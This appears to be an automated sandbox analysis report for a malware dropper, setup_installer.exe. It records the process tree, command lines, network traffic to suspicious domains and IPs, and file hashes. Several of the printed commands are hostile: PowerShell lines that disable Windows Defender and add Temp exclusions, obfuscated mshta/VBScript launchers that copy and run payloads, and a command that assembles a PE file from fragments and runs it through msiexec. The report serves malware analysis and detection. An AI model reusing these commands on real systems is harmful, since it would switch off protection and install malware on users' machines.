PID 3012 wrote to memory of 4404 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5108 wrote to memory of 4788 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5108 wrote to memory of 4788 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5108 wrote to memory of 4788 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3036 wrote to memory of 1888 N/A C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3036 wrote to memory of 1888 N/A C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3036 wrote to memory of 1888 N/A C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3036 wrote to memory of 2384 N/A C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3036 wrote to memory of 2384 N/A C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3036 wrote to memory of 2384 N/A C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3036 wrote to memory of 928 N/A C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3036 wrote to memory of 928 N/A C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3036 wrote to memory of 928 N/A C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3036 wrote to memory of 2560 N/A C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3036 wrote to memory of 2560 N/A C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3036 wrote to memory of 2560 N/A C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3036 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3036 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3036 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3036 wrote to memory of 32 N/A C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3036 wrote to memory of 32 N/A C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3036 wrote to memory of 32 N/A C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3036 wrote to memory of 4956 N/A C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3036 wrote to memory of 4956 N/A C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3036 wrote to memory of 4956 N/A C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3036 wrote to memory of 5004 N/A C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3036 wrote to memory of 5004 N/A C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3036 wrote to memory of 5004 N/A C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3036 wrote to memory of 4132 N/A C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3036 wrote to memory of 4132 N/A C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3036 wrote to memory of 4132 N/A C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3036 wrote to memory of 2936 N/A C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3036 wrote to memory of 2936 N/A C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3036 wrote to memory of 2936 N/A C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3036 wrote to memory of 1068 N/A C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3036 wrote to memory of 1068 N/A C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3036 wrote to memory of 1068 N/A C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4956 wrote to memory of 2556 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed062a0488e6dd1.exe
PID 4956 wrote to memory of 2556 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed062a0488e6dd1.exe
PID 5004 wrote to memory of 3472 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed06384ea2548.exe
PID 5004 wrote to memory of 3472 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed06384ea2548.exe
PID 1888 wrote to memory of 2864 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed067ba5199af5f.exe
PID 1888 wrote to memory of 2864 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed067ba5199af5f.exe
PID 1888 wrote to memory of 2864 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed067ba5199af5f.exe
PID 928 wrote to memory of 2252 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed06d8092a5ae.exe
PID 928 wrote to memory of 2252 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed06d8092a5ae.exe
PID 928 wrote to memory of 2252 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed06d8092a5ae.exe
PID 32 wrote to memory of 1628 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed068a6c101a0e81.exe
PID 32 wrote to memory of 1628 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed068a6c101a0e81.exe
PID 32 wrote to memory of 1628 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed068a6c101a0e81.exe
PID 4116 wrote to memory of 980 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed068cfd71e196da.exe
PID 4116 wrote to memory of 980 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed068cfd71e196da.exe
PID 4116 wrote to memory of 980 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed068cfd71e196da.exe

Processes

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed067ba5199af5f.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed067fa7edd4b875a.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed06d8092a5ae.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed0639114ac9fa.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed068cfd71e196da.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed068a6c101a0e81.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed062a0488e6dd1.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed06384ea2548.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed0625413f2fb.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed062272ee8a02b1746.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed06dffacb42ccf1c.exe

C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed06d8092a5ae.exe

Wed06d8092a5ae.exe

C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed068cfd71e196da.exe

Wed068cfd71e196da.exe

C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed067fa7edd4b875a.exe

Wed067fa7edd4b875a.exe

C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed068a6c101a0e81.exe

Wed068a6c101a0e81.exe

C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed0639114ac9fa.exe

Wed0639114ac9fa.exe

C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed062a0488e6dd1.exe

Wed062a0488e6dd1.exe

C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed06384ea2548.exe

Wed06384ea2548.exe

C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed067ba5199af5f.exe

Wed067ba5199af5f.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3036 -ip 3036

C:\Users\Admin\AppData\Local\Temp\is-5U9DJ.tmp\Wed067fa7edd4b875a.tmp

"C:\Users\Admin\AppData\Local\Temp\is-5U9DJ.tmp\Wed067fa7edd4b875a.tmp" /SL5="$40210,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed067fa7edd4b875a.exe"

C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed062272ee8a02b1746.exe

Wed062272ee8a02b1746.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3036 -s 588

C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed06dffacb42ccf1c.exe

Wed06dffacb42ccf1c.exe

C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed0625413f2fb.exe

Wed0625413f2fb.exe

C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed068a6c101a0e81.exe

C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed068a6c101a0e81.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 1124 -ip 1124

C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed067fa7edd4b875a.exe

"C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed067fa7edd4b875a.exe" /SILENT

C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed067ba5199af5f.exe

C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed067ba5199af5f.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1124 -s 356

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VBsCripT: CloSe ( crEAtEobJEct ( "WSCrIpT.ShELl"). RuN ( "cmd.exe /c copy /Y ""C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed062272ee8a02b1746.exe"" 05XkvF6f.EXe && stArt 05XkVf6F.exe /PttJqbtIGV_gKpayWgLcpQuUGXL9h& IF """" == """" for %m In ( ""C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed062272ee8a02b1746.exe"" ) do taskkill /F /im ""%~NXm"" " , 0, true ))

C:\Users\Admin\AppData\Local\Temp\is-GPT0L.tmp\Wed067fa7edd4b875a.tmp

"C:\Users\Admin\AppData\Local\Temp\is-GPT0L.tmp\Wed067fa7edd4b875a.tmp" /SL5="$7004C,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed067fa7edd4b875a.exe" /SILENT

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c copy /Y "C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed062272ee8a02b1746.exe" 05XkvF6f.EXe && stArt 05XkVf6F.exe /PttJqbtIGV_gKpayWgLcpQuUGXL9h& IF "" == "" for %m In ( "C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed062272ee8a02b1746.exe" ) do taskkill /F /im "%~NXm"

C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed068a6c101a0e81.exe

C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed068a6c101a0e81.exe

C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe

05XkVf6F.exe /PttJqbtIGV_gKpayWgLcpQuUGXL9h

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /im "Wed062272ee8a02b1746.exe"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VBsCripT: CloSe ( crEAtEobJEct ( "WSCrIpT.ShELl"). RuN ( "cmd.exe /c copy /Y ""C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe"" 05XkvF6f.EXe && stArt 05XkVf6F.exe /PttJqbtIGV_gKpayWgLcpQuUGXL9h& IF ""/PttJqbtIGV_gKpayWgLcpQuUGXL9h"" == """" for %m In ( ""C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe"" ) do taskkill /F /im ""%~NXm"" " , 0, true ))

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c copy /Y "C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe" 05XkvF6f.EXe && stArt 05XkVf6F.exe /PttJqbtIGV_gKpayWgLcpQuUGXL9h& IF "/PttJqbtIGV_gKpayWgLcpQuUGXL9h" == "" for %m In ( "C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe" ) do taskkill /F /im "%~NXm"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vBscrIpt: ClOse ( cReateobJecT ( "wScriPT.shEll" ). Run ("C:\Windows\system32\cmd.exe /q /C Echo | sEt /P = ""MZ"" >X5W6AA.ZS & CoPY /b /y X5w6AA.ZS + ZSPELY.cNM + OJM3YR.X + SVnzW.C2 + AmtZY.zXT + LPME79O.f1 + NytFSko.4 m9WDKH25.n & STart msiexec -y .\M9WDkH25.n " , 0 , TrUe ))

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /q /C Echo | sEt /P = "MZ" >X5W6AA.ZS & CoPY /b /y X5w6AA.ZS + ZSPELY.cNM + OJM3YR.X + SVnzW.C2 + AmtZY.zXT + LPME79O.f1 + NytFSko.4 m9WDKH25.n & STart msiexec -y .\M9WDkH25.n

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" Echo "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" sEt /P = "MZ" 1>X5W6AA.ZS"

C:\Windows\SysWOW64\msiexec.exe

msiexec -y .\M9WDkH25.n

C:\Windows\System32\sihclient.exe

C:\Windows\System32\sihclient.exe /cv /W2yzwG3qEaGgnRRh4HPtg.0.2

Network

Country Destination Domain Proto
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 mooorni.xyz udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
NL 45.133.1.107:80 tcp
NL 45.133.1.107:80 tcp
US 8.8.8.8:53 cdn.discordapp.com udp
US 8.8.8.8:53 ip-api.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 233.134.159.162.in-addr.arpa udp
US 8.8.8.8:53 niemannbest.me udp
US 8.8.8.8:53 all-mobile-pa1ments.com.mx udp
US 8.8.8.8:53 buy-fantasy-football.com.sg udp
US 8.8.8.8:53 topniemannpickshop.cc udp
US 8.8.8.8:53 iplogger.org udp
US 172.67.74.161:443 iplogger.org tcp
US 172.67.74.161:443 iplogger.org tcp
US 8.8.8.8:53 propanla.com udp
US 8.8.8.8:53 161.74.67.172.in-addr.arpa udp
FR 91.121.67.60:2151 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 pastebin.com udp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 8.8.8.8:53 wfsdragon.ru udp
US 104.21.5.208:80 wfsdragon.ru tcp
US 104.21.5.208:80 wfsdragon.ru tcp
FR 51.178.186.149:80 tcp
FR 51.178.186.149:80 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 208.5.21.104.in-addr.arpa udp
US 8.8.8.8:53 24.19.67.172.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 t.gogamec.com udp
FR 91.121.67.60:2151 tcp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 73.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
N/A 127.0.0.1:59052 tcp
N/A 127.0.0.1:59054 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 72.84.118.132:8080 tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
FR 91.121.67.60:2151 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 futurepreneurs.eu udp
LT 92.61.37.60:443 futurepreneurs.eu tcp
US 8.8.8.8:53 r11.o.lencr.org udp
US 8.8.8.8:53 60.37.61.92.in-addr.arpa udp
US 8.8.8.8:53 32.169.19.2.in-addr.arpa udp
GB 2.23.210.75:80 r11.o.lencr.org tcp
US 8.8.8.8:53 www.qxsgxd.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 75.210.23.2.in-addr.arpa udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
FR 91.121.67.60:2151 tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
FI 135.181.129.119:4805 tcp
FR 91.121.67.60:2151 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
FR 91.121.67.60:2151 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 170.117.168.52.in-addr.arpa udp
US 8.8.8.8:53 staticimg.youtuuee.com udp

Files

C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\setup_install.exe

MD5 35799316b448a835e4784fbdd26b5648
SHA1 fc39b78cc7615b4cbc65aff8b4d14d7b1b234cd5
SHA256 2a41d70eb106e926765798e9a407e88e49c07099247cd33924d7faa60e3e7ef0
SHA512 ae2d8b3bccbe0e7820ba6c25d76251c400b40a40fbd610b182ae8ec51154e66670b30cf13a62d06067024e9ffb9447bea6647be312e2c01f0ac6c4ea602a9660

C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

memory/3036-63-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/3036-64-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/3036-61-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/4788-65-0x000000007390E000-0x000000007390F000-memory.dmp

memory/3036-62-0x0000000064940000-0x0000000064959000-memory.dmp

memory/4404-67-0x0000000073900000-0x00000000740B0000-memory.dmp

memory/4788-76-0x0000000073900000-0x00000000740B0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed06384ea2548.exe

MD5 bdbbf4f034c9f43e4ab00002eb78b990
SHA1 99c655c40434d634691ea1d189b5883f34890179
SHA256 2da3696e82b2a874191a6f4e3bfd26d4b7e5aa5d187c5afdebbe52263dccd5ae
SHA512 dc3e513ad8cbb887652660603ce76437c6d3670637a99c1145c08fa23de658a5c5ca395cc8a2532de7b73302e88e0e8f1c026c4bb1b23481a3a5bb2dc92a68ec

C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed062a0488e6dd1.exe

MD5 c950dfa870dc50ce6e1e2fcaeb362de4
SHA1 fc1fb7285afa8d17010134680244a19f9da847a1
SHA256 b7fd0c0227a445847a051fe986bc517e2b136682d98dbe5349e2bc75e0e9e4ec
SHA512 4117875063173b5767b98300d493e2aee310a76651411ceb2f34588ae5785a0893979699c10e07d0f52d84442db6967b7155875bc7ef738a8e2c49fa70acd1f2

C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed068a6c101a0e81.exe

MD5 363f9dd72b0edd7f0188224fb3aee0e2
SHA1 2ee4327240df78e318937bc967799fb3b846602e
SHA256 e730ae821668acc373e3126bdba84b6d2b74bfdc183a23bcea5cfc94a4802167
SHA512 72681c776ba5f10e7a9c9e40f419dc79772a1370fd92cfe7f87d48a4baceb1aa381ab3a7b9b6f87780e5ee02fda108158497c13c611d2ece914241920c96aece

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_imqtk5wf.gp2.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed067ba5199af5f.exe

MD5 a4bf9671a96119f7081621c2f2e8807d
SHA1 47f50ae20bfa8b277f8c8c1963613d3f4c364b94
SHA256 d9e5cf75da07717a818853d2f1aa79d3d1aaa155bb06fffed3c92ccaf972aef7
SHA512 f0af42f99f09b5c118ebd275d0b905b91d93893034c98b84c370e7243e1b55502585808cfa33a1779d478f6e308eb32f1896d57a5f6fab0edc4362def08a5b0a

